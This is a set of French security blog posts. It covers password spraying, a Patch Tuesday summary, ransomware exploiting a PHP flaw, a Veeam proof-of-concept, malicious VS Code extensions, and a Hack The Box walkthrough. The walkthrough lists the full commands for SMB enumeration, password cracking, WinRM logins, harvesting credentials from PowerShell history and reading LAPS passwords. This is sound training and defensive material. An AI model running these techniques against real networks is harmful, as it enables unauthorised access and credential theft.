Pour un attaquant, le password spraying possède un grand avantage : il évite le blocage de compte.

En effet, par défaut, certains mécanismes sont présents en environnement Active Directoy (et aussi sur certains services et applications web) et consistent à verrouiller temporairement un compte utilisateur ayant subi de trop nombreuses tentatives d’authentification infructueuses. Dès lors, les attaques de type brute force classique vont avoir pour effet de bloquer tous les comptes, ce qui bloquera l'attaque, mais perturbera les utilisateurs, et donc lèvera l’alerte.

Via le password spraying, aucun risque de blocage. Cette opération va donc utiliser un dictionnaire d’utilisateurs là où l’attaque par brute force classique va utiliser un dictionnaire de mots de passe.

Pour une description plus formelle, je vous oriente vers le TTP du MITRE dédié à ce type d’attaque :

• MITRE ATT&CK - T1110.003 - Bruteforce: Password Spraying

D. Autres techniques dérivées

Bien sûr, d’autres méthodologies plus subtiles existent dans ce contexte des attaques par brute force. Il existe, par exemple, des listes de login “communs” qui sont susceptibles d’être présents sur tous les gros Active Directory d’entreprise. Un ensemble de listes que j’utilise fréquemment et qui donne de bons résultats est situé sur ce dépôt Github :

• Github – InsideTrust/Statistically likely usernames

Si vous avez déjà travaillé sur de gros Active Directory, il y a fort à parier que des comptes avec des logins tels que ceux-ci existent dans votre Active Directory :

• svc-backup
• ldapsvc
• formateur
• accueil
• imprimante
• scan
• etc.

Dès lors, et sans connaissance d’aucun login valide, un attaquant peut utiliser ce genre de dictionnaire pour tenter des attaques en “user as pass”, c’est-à-dire ciblant des comptes qui ont un login “commun” ainsi qu’un mot de passe égal à leur login (exemple “scan:scan”).

Dans ces cas de figure, l’attaquant tente un mot de passe par login également, mais avec un mot de passe “différent” (car dépendant du login utilisé).

Cela peut paraître totalement absurde, mais c’est loin d’être rare et c’est généralement un moyen très rapide et simple d’obtenir un premier accès authentifié à un Active Directory. On peut également retrouver ce type d’opérations dans un contexte web visant des services et applications/frameworks connus. Il existe, par exemple, des listes de couples login/mot de passe connus pour l’accès à un Tomcat Manager qui serait un peu trop exposé, ou d'autres contenant des identifiants fréquemment utilisés pour les services SSH (“root:root”, “root:toor”, etc.)

IV. Où l’attaquant trouve-t-il des mots de passe ?

On peut naturellement se poser la question de la provenance des dictionnaires de mots de passe utilisés par les attaquants lors d’un brute force. Comment l’attaquant choisit les mots de passe qu’il va tenter ?

Nous avons vu qu'une attaque par brute force, l’attaquant se constitue donc une liste de logins à partir de différentes sources, puis il utilisera des dictionnaires de mots de passe déjà constitués. Ces dictionnaires de mots de passe sont la plupart du temps récupérés publiquement. Il existe des dépôts GitHub publics qui référencent de nombreuses wordlist, la plupart étant issues :

• D’un travail de référencement des mots de passe par défaut d’application web, d’équipements en tout genre (switch, routeur) ou de services (mssql, mysql, etc.).
• De fuites de données dont le contenu finit par être publié sur Internet (cas de l’entreprise Rockyou, dont la fuite de données à entrainé la création d'une wordlist contenant 14 344 391 mots de passe).

Voici, en exemple, l’un des dépôt GitHub les plus connus :

• GitHub – danielmiessler/SecLists/Passwords

D'autres sources de liste de mots de passe existent, dont certaines totalement illégales. On peut notamment mentionner les sites qui proposent l'achat du contenu des fuites de données récentes.

Pour des attaques plus précises, l’attaquant peut lui-même construire sa propre wordlist en fonction de son contexte d’attaque. Il utilisera alors une base de mots probables (nom de l’entreprise, nom et numéro de département) ainsi que des outils comme "hashcat" ou "johntheripper", qui permettent de construire des dérivés de mots de passe ("IT-Connect" deviendra "IT-C0nnect", "IT-Connect01!", "ItConnect2024!", etc.) à partir d’une liste initiale. Voici un exemple :

V. Comment se protéger d'une attaque par brute force ?

A. Politique de mot de passe

La première et principale mesure à prendre afin de se protéger des attaques par bruteforce est de renforcer la robustesse de tous les mots de passe. Il convient de mettre en place une politique de mot de passe robuste afin de limiter les chances de succès d’une attaque par brute force basée sur des mots de passe triviaux. Plus les mots de passe sont longs et aléatoires, moins un attaquant aura de chance de les découvrir via ce type d’attaque.

Je vous oriente vers le guide de l’ANSSI sur le sujet pour définir une politique de mot de passe efficace :

• ANSSI - Recommandations relatives à l'authentification multifacteur et aux mots de passe
• Active Directory : comment configurer une stratégie de mots de passe affinée ?
• Utiliser des passphrases à la place des mots de passe

En plus des éléments habituels que sont la longueur, la complexité et le nombre d’alphabets utilisés, la politique doit aussi s’assurer que, dans son mot de passe, l’utilisateur n’utilise pas de mots issus d’informations “publiques” (son nom, nom d’un proche, nom de l’entreprise, d’un projet, région, lieu de vacances de l’année dernière…). Pour cela, différentes techniques et outils existent en fonction des contextes. On peut notamment citer :

• Azure AD Password Protection : IT-Connect - Active Directory : configuration d’Azure AD Password Protection on-premise
• L’outil Specops Password Policy : IT-Connect - Active Directory : améliorez la gestion des mots de passe avec Specops Password Policy
• Il peut aussi être envisagé des contrôles d’entropie, notamment dans le cadre d’application web.

Attention, il ne faut pas oublier que la politique de mot de passe doit être appliquée à la création d’un compte, mais aussi lors des phases de changement de mot de passe.

B. Politique de verrouillage/quota

Nous avons vu que la politique de verrouillage a aussi son importance. Celle-ci permet de définir le seuil de verrouillage d’un compte, mais aussi la durée du verrouillage et la fenêtre de temps observation.

Grâce à ces paramètres, il est possible de grandement ralentir l’opération de l’attaquant, voire de le détecter si un pic de verrouillage de compte est observé. Attention toutefois aux effets de bords (blocage d’un grand nombre de comptes utilisateur). À nouveau, je vous invite à lire notre article sur le sujet :

• IT-Connect - Active Directory et le verrouillage des comptes

Ces politiques de verrouillage de compte peuvent parfois plutôt prendre la forme d’un quota ou d’un bannissement temporaire d’IP. C’est notamment le cas pour les applications web exposées sur Internet. Dans de tels cas, un attaquant pourrait très facilement exploiter la politique de verrouillage des comptes afin de bloquer temporairement ou définitivement (en fonction de sévérité de la politique) les comptes utilisateurs de la plateforme visée.

Il est, en effet, tout à fait envisageable pour un attaquant d’atteindre le seuil de verrouillage pour un compte qu’il sait existant sur l’application web visée afin de rendre indisponible l’application pour le ou les utilisateurs ciblés. Puis, de recommencer son opération de blocage dès que le verrouillage aura expiré, entraînant de fait un déni de service.

Pour empêcher cette exploitation du seuil de verrouillage, il est en général préféré de bannir l’adresse IP de l’attaquant ou de n’autoriser une même adresse IP à faire uniquement quelques requêtes d’authentification par minute.

C. Authentification multifacteurs

La troisième principale méthode pour se protéger des attaques par brute force est de faire en sorte que la connaissance du mot de passe ne suffise pas à se connecter à un compte. On y ajoutera alors un second facteur d’authentification, comme un OTP (One Time Password) envoyé par SMS, e-mail ou via une application spécialisée sur smartphone.

En fonction de la réponse du service visé, l’attaquant pourra certainement savoir si le mot de passe tenté est correct (redirection vers la phase “second facteur”), mais cette information ne sera pas suffisante pour compromettre les comptes ciblés.

Pour aller plus loin, je vous recommande vivement de consulter l’excellent document de l’ANSSI à ce sujet :

• ANSSI - Recommandations relatives à l'authentification multifacteur et aux mots de passe

VI. Conclusion

Dans cet article, nous avons vu ce que sont les attaques par brute force et dans quel but elles sont utilisées lors d’une cyberattaque, que ce soit dans un environnement Active Directory, une application web ou tout autre service réseau dont la sécurité repose sur le couple login/mot de passe.

Nous avons également vu les principaux moyens de protection des comptes utilisateurs contre ces attaques. Pour aller plus loin, il faudrait s’intéresser au moyen de détection d’une telle attaque, mais cela dépend beaucoup de l’environnement ciblé et sera différent, qu’il s’agisse d’un service SSH isolé, d’une application web, ou d’une opération ciblant les comptes d’un Active Directory.

Dans tous les cas, un élément commun sera à utiliser : les journaux d’évènements, leur bonne configuration, leur centralisation et leur surveillance active !

N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord !

The post L’essentiel sur les attaques brute force : principes, types d’attaques et mesures de protection first appeared on IT-Connect.

Le Patch Tuesday de Juin 2024 a été publié par Microsoft ! Il inclut des correctifs de sécurité pour 51 vulnérabilités ainsi qu'une faille de sécurité zero-day déjà connue avant la publication de ce patch. Faisons le point.

Ce mardi 11 juin 2024, Microsoft a publié un Patch Tuesday relativement léger en comparaison des mois précédents. L'entreprise américaine a corrigé des failles de sécurité dans plusieurs services Azure (Monitor, File Sync, etc.), mais aussi dans la suite Office (Outlook, Word, notamment), dans Visual Studio, le rôle Serveur DHCP, dans la fonction DFS, ainsi que dans différents composants de Windows y compris le noyau du système d'exploitation.

Pour en savoir plus sur les mises à jour pour Windows 10 et Windows 11 :

• Mise à jour Windows 10 de juin 2024 (KB5039211)
• Mise à jour Windows 11 de juin 2024 (KB5039212)

Une seule faille de sécurité critique : CVE-2024-30080

Ce Patch Tuesday corrige une seule faille de sécurité critique, associée à la référence CVE-2024-30080, présente dans Microsoft Message Queuing (MSMQ).

Elle permet une exécution de code à distance, comme l'explique Microsoft : "Pour exploiter cette vulnérabilité, un attaquant doit envoyer un paquet MSMQ malveillant spécialement conçu à un serveur MSMQ. Cela pourrait entraîner l'exécution de code à distance du côté du serveur." - Le service de Message Queuing écoute sur le port 1801/TCP lorsqu'il est actif sur une machine.

Elle affecte Windows 10, Windows 11 ainsi que toutes les versions de Windows Server à partir de Windows Server 2008.

CVE-2023-50868 - DNSSEC : déni de service sur les serveurs DNS

Déjà connue publiquement, la faille de sécurité CVE-2023-50868 n'est pas exploitée dans le cadre de cyberattaques (à ce jour). Il s'agit d'une vulnérabilité présente dans DNSSEC et plus précisément dans le mécanisme NSEC3 (utilisé pour les preuves de non-existence d'un enregistrement DNS). En exploitant cette faiblesse, un attaquant peut causer un déni de service grâce à l'augmentation de la charge CPU sur la machine ciblée, en l'occurrence un résolveur DNS.

Cette vulnérabilité affecte Windows Server 2012 et les versions supérieures, y compris les installations en mode "Core", où le rôle de serveur DNS est installé. En fait, cette faille de sécurité n'est pas liée à Windows Server mais à DNSSEC, donc les autres implémentations de serveurs DNS, y compris sur Linux, sont affectées. Pour en savoir plus, vous pouvez consulter cette page.

Source

The post Patch Tuesday – Juin 2024 : 51 failles de sécurité et 1 zero-day corrigées par Microsoft ! first appeared on IT-Connect.

Le gang de ransomware TellYouThePass exploite activement la faille de sécurité critique découverte dans PHP ! Grâce à cette vulnérabilité, ils peuvent déployer un webshell et l'utiliser pour exécuter un payload pour chiffrer les données du système compromis ! Faisons le point sur cette menace.

Depuis quelques jours, une faille de sécurité critique présente dans PHP et associée à la référence CVE-2024-4577 a été divulguée et corrigée par les mainteneurs du projet PHP. Présente dans toutes les versions de PHP à partir de la version 5.X, et jusqu'aux branches les plus récentes, cette vulnérabilité permet une exécution de code à distance lorsque PHP est utilisé sur Windows. Si vous souhaitez en savoir plus, retrouvez notre article à ce sujet : PHP - CVE-2024-4577.

Le 6 juin 2024, de nouvelles versions de PHP ont été publiées pour corriger cette vulnérabilité. Moins de 48 heures plus tard, le gang de ransomware TellYouThePass a commencé à lancer ses premières attaques ! D'ailleurs, ce n'est pas la première fois que ce gang de ransomware se montre très réactif pour tenter d'exploiter les vulnérabilités présentes sur les services Web. C'était déjà le cas avec une précédente vulnérabilité dans Apache ActiveMQ ainsi que la fameuse faille de sécurité dans Log4j.

Les chercheurs en sécurité d'Imperva ont mis en ligne un nouveau rapport pour évoquer cette campagne de cyberattaques menée par TellYouThePass. "Les attaquants ont utilisé l'exploit connu pour la CVE-2024-3577 afin d'exécuter un code PHP arbitraire sur le système cible, en s'appuyant sur le code pour utiliser la fonction "system" afin d'exécuter un fichier d'application HTML hébergé sur un serveur web contrôlé par l'attaquant via le binaire mshta.exe.", peut-on lire.

Une fois que la souche malveillante est en place, elle envoie une requête HTTP au serveur C2 des cybercriminels pour notifier l'infection. Afin d'échapper aux systèmes de détection, cette requête se fait passer pour une demande de récupération de ressources CSS. Au passage, l'adresse IP du serveur C2 semble codée en dur dans l'échantillon analysé par les chercheurs en sécurité : 88[.]218.76.13.

L'étape finale : l'exécution du ransomware TellYouThePass

La dernière étape consiste à exécuter le ransomware TellYouThePass sur la machine compromise. Autrement dit, sur le serveur Web Windows compromis par l'intermédiaire de PHP.

Le logiciel malveillant commence par énumérer les répertoires avant de tuer différents processus et de générer les clés de chiffrement afin de commencer à chiffrer les données de la machine. Ceci inclut notamment les données de l'application Web.

Pour finir, une note de rançon représentée par le fichier "READ_ME10.html" est déposée sur la machine, à la racine du répertoire web.

Protégez-vous de cette vulnérabilité dès que possible. D'après un rapport de Censys, en date du 9 juin 2024, il y avait 458 800 serveurs exposés sur Internet et potentiellement vulnérables à cette faille de sécurité.

Source

The post Le ransomware TellYouThePass exploite la faille critique dans PHP pour pirater les serveurs Web ! first appeared on IT-Connect.

I. Présentation

Dans cet article, je vous propose la résolution de la machine Hack The Box Timelapse, de difficulté "Facile". Cet exercice vous montrera un exemple très concret et plutôt réaliste de compromission d'un Active Directory et donc d'un domaine dans un réseau d'entreprise.

Hack The Box est une plateforme en ligne qui met à disposition des systèmes vulnérables appelées "box". Chaque système est différent et doit être attaqué en adoptant la démarche d'un cyberattaquant. L'objectif est d'y découvrir les vulnérabilités qui nous permettront de compromettre les utilisateurs du système, puis le compte root ou administrateur.

Ces exercices permettent de s’entraîner légalement sur des environnements technologiques divers (Linux, Windows, Active directory, web, etc.), peuvent être utiles pour tous ceux qui travaillent dans la cybersécurité (attaquants comme défenseurs) et sont très formateurs.

Je vais ici vous détailler la marche à suivre pour arriver au bout de cette box en vous donnant autant de conseils et ressources que possible. N'hésitez pas à consulter les nombreux liens qui sont présents dans l'article.

Cette solution est publiée en accord avec les règles d'HackThebox et ne sera diffusée que lorsque la box en question sera indiquée comme "Retired".

Technologies abordées	Windows, Powershell, LAPS
Outils utilisés	nmap, smbclient, johntheripper, evil-winrm, openssl, PowerShell

Retrouvez tous nos articles Hack The Box via ce lien :

• IT-Connect - Articles Hack The Box

II. Résolution de la box Timelapse

A. Découverte et énumération

Pour l'instant, nous ne disposons que de l'adresse IP de notre cible. Commençons par un scan réseau à l'aide de l'outil nmap pour découvrir les services exposés sur le réseau, et pourquoi pas leurs versions.

Technique d'attaque (MITRE ATT&CK) : T1046 - Network Service Discovery

$ nmap 10.10.11.152 -p- -T5 -Pn
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans

De nombreux services sont exposés et nous pouvons directement distinguer des services propres aux systèmes d'exploitations Windows et même à l'Active Directory (TCP/88).

Retrouvez notre cours complet sur Nmap sur lien suivant :

• IT-Connect - Maîtrisez Nmap pour la cartographie réseau et le scan de vulnérabilités

B. Recherche dans un partage de fichiers

Une première opération à réaliser systématiquement est de vérifier que tous les partages sont bien protégés par une authentification, exemple avec le port TCP/445 (SMB) et l'outil "smbmap" :

Technique d'attaque (MITRE ATT&CK) : T1078.001 - Valid Accounts: Default Accounts

$ smbmap -u "%" -p "" -P 445 -H 10.10.11.152 --no-banner

Voici le retour que l'on peut observer :

Le service SMB accepte les null sessions, on peut donc s'y authentifier et parcourir certains partages de fichier sans connaitre d'identifiants valides. Une rapide découverte des fichiers stockés nous permet de découvrir une archive ".zip" :

Technique d'attaque (MITRE ATT&CK) : T1083 - File and Directory Discovery

Celle-ci est protégée par un mot de passe, nous pouvons utiliser l'outil "zip2john" afin d'extraire le hash de ce mot de passe dans un format que l'outil de cassage "John The Ripper" saura interpréter. Nous pourrons ensuite utiliser cet outil pour tenter de retrouver le mot de passe correspondant à ce hash à l'aide d'une attaque par brute force reposant sur le dictionnaire "rockyou.txt" :

Technique d'attaque (MITRE ATT&CK) : T1110.002 - Brute Force: Password Cracking

$ zip2john winrm_backup.zip > /tmp/zipPasswordHash
$ john /tmp/zipPasswordHash --wordlist=rockyou.txt
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)

L'utilisation d'un mot de passe faible nous permet d'ouvrir l'archive pour en extraire un fichier ".pfx", dont l'accès est également protégé par un mot de passe. Nous pouvons réitérer la même opération sur ce format de fichier (avec "pfx2john") :

$ pfx2john legacyy_dev_auth.pfx > /tmp/pfxPasswordHash
$ john /tmp/pfxPasswordHash --wordlist=rockyou.txt
thuglegacy       (legacyy_dev_auth.pfx) 

Comme vous pouvez le remarquer, l'outil "John The Ripper" va détecter lui-même le format du hash et adapter son cassage de mot de passe en conséquence. Le nom du fichier semble nous indiquer qu'il appartient à l'utilisateur "legacyy".

Maintenant que nous connaissons le mot de passe du fichier ".pfx", qui est un certificat privé, nous pouvons extraire la clé privée et le certificat qu'il contient :

$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes 
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem

C. Accès winRM et historique PowerShell

Une clé privée est avant tout utilisée pour prouver une identité, c'est-à-dire s'authentifier. Nous pouvons tenter d'utiliser ces informations afin de nous authentifier sur les services exposés de notre cible qui accepte ce mode d'authentification. J'utilise ici l'outil "evil-winrm" afin de m'authentifier sur le service WinRM (TCP/5985) en utilisant la clé privée et le certificat précédemment découvert :

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management

evil-winrm  --user Legacy -k priv-key.pem -i timelapse.htb -p thuglegacy -S -c certificate.pem
*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt
a9a2[REDACTED]d351f

Une fois qu'un accès interactif distant est obtenu sur une cible, l'attaquant peut mener de nombreuses opérations pour comprendre où il est sur le réseau, sur le système, quels sont ses droits locaux, à quoi sert le système compromis, etc. Parmi ces opérations figure la vérification de l'historique utilisateur, stocké dans un fichier dans le répertoire de chaque utilisateur dans le cas de PowerShell :

Technique d'attaque (MITRE ATT&CK) : T1083 - File and Directory Discovery

Evil-WinRM* PS C:\Users\legacyy> cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

Dans notre cas, l'historique de commande PowerShell nous permet de retrouver un mot de passe en clair saisi lors de sa conversion en objet "SecureString". Nous pouvons également facilement savoir à quel utilisateur il appartient : "svc_deploy". Ce compte peut ensuite être utilisé pour accéder à distance au système à l'aide de la commande "evil-winrm" :

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management

$ evil-winrm --user svc_deploy -i timelapse.htb -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

D. Élévation de privilège via LAPS_READERS

Nouveau compte, nouvelle énumération. Il nous faut à présent connaitre les droits supplémentaires de ce compte par rapport au compte précédent afin de savoir si celui-ci nous permettra d'aller encore plus loin sur le système. Je liste, par exemple, l'ensemble de mes droits et permissions sur le système d'exploitation via avec la commande ""whoami /all"" :

Technique d'attaque (MITRE ATT&CK) : T1069.002 - Permission Groups Discovery: Domain Groups

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all
User Name            SID
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103

GROUP INFORMATION
TIMELAPSE\LAPS_Readers                      Group            S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group

Cet utilisateur "svc_deploy" fait partie du groupe "TIMELAPSE/LAPS_READERS", il s'agit d'un groupe important qui permet de gérer, et donc lire, les mots de passe LAPS des systèmes du domaine.

Pour en apprendre plus sur ce qu'est LAPS et surtout son apport en termes de sécurité, n'hésitez pas à consulter nos tutoriels à ce sujet :

• Active Directory - Comment configurer Windows LAPS ?
• Intune - Comment configurer Windows LAPS ?

Ce droit très sensible me permet notamment de récupérer le mot de passe de l'administrateur du contrôleur du domaine, opération ici réalisée en PowerShell :

Technique d'attaque (MITRE ATT&CK) : T1555 - Credentials from Password Stores

> Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : (z)e;CScAMkY1{C-h{vq8oSb
Name                        : DC01

Avec cette information, nous obtenons les droits de l'utilisateur local "Administrator". Autrement dit, nous avons compromis le contrôleur de domaine, et par extension le domaine lui-même.

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management

*Evil-WinRM* PS C:\Users\Administrator> whoami
timelapse\administrator
*Evil-WinRM* PS C:\Users\TRX> cat Desktop/root.txt
74d6f[REDACTED]9c2d6

III. Résumé de l'attaque

Voici une description de l'attaque réalisée en utilisant les TTP (Tactics, Techniques and Procedures) du framework MITRE ATT&CK :

TTP (MITRE ATT&CK)	Détails
T1046 - Network Service Discovery	Scan réseau réalisé via nmap pour découvrir les services exposés
T1078.001 - Valid Accounts: Default Accounts	Découverte et utilisation d'un null session sur le service SMB
T1083 - File and Directory Discovery	Recherche de fichiers sensibles dans le partage de fichier via smbmap. Téléchargement d'une archive ZIP
T1110.002 - Brute Force: Password Cracking	Attaque par bruteforce sur un ".zip" chiffré, puis un fichier ".pfx"
T1021.006 - Remote Services: Windows Remote Management	Accès distant winRM avec le compte "legacyy" et l'outil "evil-winrm".
T1083 - File and Directory Discovery	Recherche de fichiers sensibles sur le système avec les droits de l'utilisateur "legacyy". Découverte d'un mot de passe dans l'historique PowerShell.
T1021.006 - Remote Services: Windows Remote Management	Accès distant winRM avec le compte "svc-deploy" et l'outil "evil-winrm".
T1069.002 - Permission Groups Discovery: Domain Groups	Découverte des groupes dont est membre "svc-deploy" via PowerShell.
T1555 - Credentials from Password Stores	Récupération du mot de passe de l'administrateur local du contrôleur de domaine via PowerShell
T1021.006 - Remote Services: Windows Remote Management	Accès distant winRM avec les identifiants de l'administrateur local.

IV. Notions abordées

A. Côté attaquant

Le chemin d'attaque de cette box propose la découverte et l'exploitation de vulnérabilité assez classiques et réalistes, notamment concernant l'identification des partages réseau. Il est très fréquent de trouver des partages réseau sur les hôtes d'un système d'information dont certains sont très mal protégés. Cela parfois à cause du "shadow IT", des services montés dans le dos de l'équipe informatique, ou par simple négligence sur un périmètre trop important et difficile à maitriser.

À ce titre, la découverte des partages de fichiers et la recherche d'information sensible aurait également pu être réalisée via Snaffler, qui nous aurait sorti le même résultat.

Pour en apprendre plus sur cet outil puissant, voici notre article sur le sujet :

• IT-Connect - Analysez vos partages de fichiers Active Directory avec Snaffler pour protéger vos données

B. Côté défenseur

Pour sécuriser ce système, nous pouvons proposer plusieurs recommandations :

Recommandation n°1 : Nous pouvons ici recommander dans un premier temps de renforcer la politique de mots de passe sur le service SMB notamment en interdisant les null sessions. Le mot de passe utilisé pour protéger l'archive ".zip" et le ".pfx" sont faibles puisqu'ils ont été cassés à l'aide du dictionnaire très classique rockyou.txt. Nous pouvons citer en ressource externe le guide de l'ANSSI sur les mots de passe : Recommandations relatives à l'authentification multifacteur et aux mots de passe.

• IT-Connect - Politique de mot de passe : comment appliquer les bonnes pratiques de l’ANSSI ?
• IT-Connect - Pourquoi faut-il préférer les passphrases aux mots de passe ?

Recommandation n°2 : par extension, il peut être recommandé de vérifier la présence de fichiers sensibles dans les partages réseau, cela pour éviter qu'un utilisateur ou attaquant ne tombe sur des fichiers qu'il n'est pas censé trouver.

Recommandation n°3 : enfin, il peut être recommandé de sensibiliser l'équipe technique à la manipulation des mots de passe, surtout pour éviter qu'ils se retrouvent stockés dans l'historique PowerShell ou ailleurs.

L'élévation de privilège réalisé ici n'a rien d'anormal une fois que l'on a compromis le compte "svc-deploy". On peut s'interroger sur la légitimité de l'appartenance au groupe "LAPS_READERS" mais cela dépends essentiellement du contexte métier et organisationnel. Une fois ce compte compromis, on ne fait finalement qu'une opération légitime : récupérer un attribut auquel les membres de groupe ont accès. Le compte "svc-deploy" a d'ailleurs un mot de passe plutôt correct.

J’espère que cet article vous a plu ! N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord!

Enfin, si vous voulez accéder à des cours et modules dédiés aux techniques offensives ou défensives et améliorer vos compétences en cybersécurité, je vous oriente vers Hack The Box Academy, utilisez ce lien d'inscription (je gagnerai quelques points ) : Tester Hack the Box Academy

The post Compromission Active Directory – Le cas de la Box Timelapse de Hack The Box first appeared on IT-Connect.

Vous utilisez Veeam Backup & Replication ainsi que Veeam Backup Enterprise Manager ? Sachez qu'un exploit PoC a été publié pour une faille de sécurité critique permettant à un attaquant d'outrepasser l'authentification. Faisons le point.

Pour rappel : Veeam Backup Enterprise Manager est une console Web de gestion et reporting pour la célèbre solution Veeam Backup & Replication. Elle offre l'avantage de permettre de gérer plusieurs instances Veeam à partir d'une console unique. Il est important de préciser qu'elle n'est pas activée par défaut, donc toutes les organisations ne sont pas exposées à ce risque de sécurité.

La faille de sécurité CVE-2024-29849 présente dans Veeam Backup Enterprise Manager a déjà été corrigée par Veeam puisqu'un bulletin de sécurité a été publié à son sujet le 21 mai 2024. Nous avions repris cette alerte de sécurité dans l'un de nos précédents articles pour vous avertir. Si vous n'avez pas encore fait le nécessaire pour vous protéger, il va être temps de passer à l'action : un exploit PoC a été publié pour cette vulnérabilité.

Un exploit PoC pour la CVE-2024-29849

Le chercheur en sécurité Sina Kheirkhah a mis en ligne un rapport technique au sujet de la faille de sécurité CVE-2024-29849. Ce rapport est accompagné par un exploit PoC publié sur son GitHub, et qui prend la forme d'un script Python.

Dans son rapport, il explique que la faille de sécurité se situe dans "Veeam.Backup.Enterprise.RestAPIService.exe" qui est en écoute sur le serveur, sur le port TCP 9398. D'un point de vue de l'application web principale, il agit comme un serveur API REST. L'exploitation consiste à envoyer un jeton de signature VMware (SSO) spécialement conçu au service vulnérable, en utilisant l'API de Veeam. Finalement, l'attaquant peut usurper l'identité d'un compte administrateur et accéder à l'application sans avoir besoin de s'authentifier.

Le rapport de Sina Kheirkhah est très détaillé et contient toutes les informations techniques nécessaires à la compréhension et l'exploitation de cette vulnérabilité.

Comment se protéger ?

La meilleure façon de se protéger, c'est d'installer le correctif de sécurité publié par Veeam. Le 21 mai 2024, l'éditeur américain a publié la version 12.1.2.172 pour corriger plusieurs vulnérabilités, dont celle-ci.

De plus, il semble judicieux de limiter à certaines adresses IP les accès à l'application sur le port TCP 9398, mais aussi d'activer le MFA sur l'ensemble des comptes de l'application. Enfin, si vous n'utilisez pas Veeam Backup Enterprise Manager, vous pouvez le désinstaller comme l'explique cette page de la documentation Veeam.

Source

The post Veeam Backup Enterprise Manager : un exploit PoC a été publié pour une faille de sécurité critique ! first appeared on IT-Connect.

La marketplace de Visual Studio Code est très utile pour ajouter des fonctionnalités à l'éditeur de code de Microsoft et le personnaliser, notamment avec des thèmes. Néanmoins, c'est aussi un nid à malwares : des chercheurs en sécurité ont identifié des milliers d'extensions malveillantes ! Faisons le point.

Pour rappel, Visual Studio Code est un éditeur de code gratuit et open source développé par Microsoft. Il prend en charge de nombreux langages, notamment PowerShell et Python, et il est très utilisé par les professionnels de l'IT.

Par l'intermédiaire de la marketplace pour Visual Studio Code, Microsoft distribue des extensions pour VSCode afin de lui ajouter des fonctionnalités et de personnaliser son apparence. Les membres de la communauté peuvent, eux aussi, publier du contenu sur cette marketplace : les cybercriminels l'ont bien compris et en profitent également.

Visual Studio Code et la menace du typosquatting

Récemment, trois chercheurs en sécurité israéliens, Amit Assaraf, Itay Kruk, et Idan Dardikman, ont mené une expérience. Ils ont créé une version malveillante du thème "Dracula Official", l'un des éléments de la marketplace les plus populaires (plus de 7 millions de téléchargements).

Ils ont repris le code d'origine de l'extension et ils ont ajouté un script supplémentaire pour collecter des informations sur le système de l'utilisateur. Les informations collectées sont envoyées sur un serveur via HTTPS. Leur version de ce thème ne s'appelle pas "Dracula Official" mais "Darcula Official" (subtile !) et elle reprend le même logo, ainsi que le domaine "darculatheme.com" qui ajoute de la crédibilité. Ils sont parvenus à publier cette extension sur la marketplace de Visual Studio Code.

24 heures plus tard, il y avait déjà plus de 100 installations, c'est-à-dire 100 ordinateurs qui pourraient potentiellement être compromis s'il y avait un réel code malveillant. "Nous avons remarqué qu'une victime avait été identifiée comme étant une machine Windows dans le domaine et le réseau d'une société cotée en bourse dont la capitalisation boursière s'élève à 483 milliards de dollars.", précise les chercheurs en sécurité.

Étant donné que Visual Studio Code est destiné à exécuter du code divers et variés, à exécuter des processus, etc... Il est difficile de déterminer si son activité est malveillante ou non.

À ce sujet, les chercheurs en sécurité apportent des précisions au sein de leur article disponible sur Medium : "Malheureusement, les outils traditionnels de sécurité des terminaux (EDR) ne détectent pas cette activité (comme nous l'avons montré pour certaines organisations dans le cadre du processus de divulgation responsable). VSCode est conçu pour lire de nombreux fichiers, exécuter de nombreuses commandes et créer des processus enfants, de sorte que les EDR ne peuvent pas déterminer si l'activité de VSCode est une activité de développeur légitime ou une extension malveillante."

Attention à la marketplace de Visual Studio Code

À l'aide d'un outil qu'ils ont développé, les trois chercheurs sont parvenus à analyser en profondeur le contenu publié sur la marketplace de Visual Studio Code. Ils sont parvenus à identifier :

• 1 283 extensions contenant des dépendances malveillantes connues, pour un total de 229 millions d'installations
• 87 extensions qui tentent de lire le fichier /etc/passwd sur le système hôte.
• 8161 extensions qui communiquent avec une adresse IP codée en dur à partir d'un code JS.
• 1 452 extensions qui exécutent un binaire exécutable inconnu ou une DLL sur la machine hôte.
• 267 extensions contiennent des secrets vérifiés codés en dur.
• Le code et les ressources de 145 extensions ont été signalés comme malveillant par VirusTotal.
• 2 304 extensions qui utilisent le dépôt Github d'un autre éditeur comme dépôt officiel, ce qui implique des extensions copiées.

